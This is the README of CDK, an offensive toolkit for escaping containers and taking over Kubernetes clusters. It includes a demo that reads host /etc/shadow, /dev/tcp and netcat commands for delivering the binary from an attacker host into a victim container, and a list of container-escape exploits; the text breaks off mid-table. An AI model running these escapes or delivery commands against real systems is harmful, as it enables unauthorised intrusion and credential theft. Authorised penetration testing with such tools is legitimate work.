CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Quick Start

Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

1. First, host CDK binary on your host with public IP.

(on your host)
nc -lvp 999 < cdk

2. Inside the victim container execute

cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Features

CDK has three modules:

1. Evaluate: gather information inside container to find potential weakness.
2. Exploit: for container escaping, persistance and lateral movement
3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

|Tactics|Script|Supported|Usage/Example| |---|---|---|---| |Information Gathering|OS Basic Info|✔|link| |Information Gathering|Available Capabilities|✔|link| |Information Gathering|Available Linux Commands|✔|link| |Information Gathering|Mounts|✔|link| |Information Gathering|Net Namespace|✔|link| |Information Gathering|Sensitive ENV|✔|link| |Information Gathering|Sensitive Process|✔|link| |Information Gathering|Sensitive Local Files|✔|link| |Information Gathering|Kube-proxy Route Localnet(CVE-2020-8558)|✔|link| |Information Gathering|DNS-Based Service Discovery|✔|link| |Discovery|K8s Api-server Info|✔|link| |Discovery|K8s Service-account Info|✔|link| |Discovery|Cloud Provider Metadata API|✔|link|

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]

| Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc | |----------------------|------------------------------------------------------------|------------------------|-----------|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------| | Escaping | docker-runc CVE-2019-5736 | runc-pwn | ✔ | ✔ || | Escaping | containerd-shim CVE-2020-15257 | shim-pwn | ✔ || link | | Escaping | docker.sock PoC (DIND attack) | docker-sock-check | ✔ | ✔ | link | | Escaping | docker.sock RCE | docker-sock-pwn | ✔ | ✔ | link | | Escaping | Docker API(2375) RCE | docker-api-pwn | ✔ | ✔ | link | | Escaping | Device Mount Escaping | mount-disk | ✔ | ✔ | link | | Escaping | LXCFS Escaping | lxcfs-rw | ✔ | ✔ | link | | Escaping | Cgroups Escaping | mount-cgroup | ✔ | ✔ | link | | Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | ✔ | ✔ | link | | Escaping | Procfs Escaping | mount-procfs | ✔ | ✔ | link | | Escaping | Ptrace Escaping PoC | check-ptrace | ✔ | ✔ | link | | Escaping | Rewrite Cgroup(devices.allow) | rewrite-cgroup-devices | ✔ | ✔ | link | | Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | ✔ | ✔ | link | | Discovery | K8s Component Probe | service-probe | ✔ | ✔ | link | | Discovery | Dump Istio Sidecar Meta